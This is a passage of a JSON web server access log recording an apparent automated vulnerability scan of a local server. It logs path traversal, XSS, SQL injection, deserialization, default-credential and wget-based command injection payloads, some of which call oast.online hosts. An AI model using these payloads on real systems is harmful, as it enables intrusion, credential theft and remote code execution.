+0000","request_body":"\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0ArO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==\x0D\x0AgetUnsavedChanges\x0D\x0ArO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QALWM5djhnYzhzbXB2OGIwbmcwdDAwNzhoM3RzejRjN3M3Zy5vYXN0Lm9ubGluZXQAAHEAfgAFdAAFaHR0cHNweHQAGWh0dHBzOi8vdGVzdC5qZXhib3NzLmluZm94\x0D\x0ArO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=\x0D\x0A\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms:// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /eam/vib?id=C:\x5CProgramData\x5CVMware\x5CVMware+VirtualCenter\x5Cvcdb.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.rsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /smb.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/proxy/tcp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/geojson?url=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"297MFhXDBHpXEOBMMRCRrsao3fA.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/admin/common/clearcache?previousUrl=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"requester=login&request=login¶ms=[{\x22name\x22:\x22input_id\x22,\x22value\x22:\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\x22},{\x22name\x22:\x22input_passwd\x22,\x22value\x22:\x22PASSWORD\x22},{\x22name\x22:\x22device_id\x22,\x22value\x22:\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\x22},{\x22name\x22:\x22checked\x22,\x22value\x22:false},{\x22name\x22:\x22login_key\x22,\x22value\x22:\x22\x22}]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /http/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /eam/vib?id=C:\x5CDocuments+and+Settings\x5CAll+Users\x5CApplication+Data\x5CVMware\x5CVMware+VirtualCenter\x5Cvcdb.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login/?next=/admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_ignition/scripts/--%3E%3Csvg%20onload=alert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"page=login_change&oper=0&username=admin&password=conel&submit=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /documentation HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /WEB_VMS/LEVEL15/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"user=admin&passwd=admin&challengePwd=&ok=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"csrf_token={{csrf_token}}&username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1/admin/airflow/login", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /anchor/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/admin/pipelines/create?group=defaultGroup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /eam/vib?id=C:\x5CProgramData\x5CVMware\x5CvCenterServer\x5Ccfg\x5Cvmware-vpx\x5Cvcdb.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?action=command&command=set_city_timezone&value=$(wget%20http://c9v8gc8smpv8b0ng0t008yxoy6epawzwd.oast.online)) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/Attitude/go.php?https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /ui_base/js/..%2f..%2f..%2f..%2fsettings.js HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=en&gurl=/www.pluginvulnerabilities.com 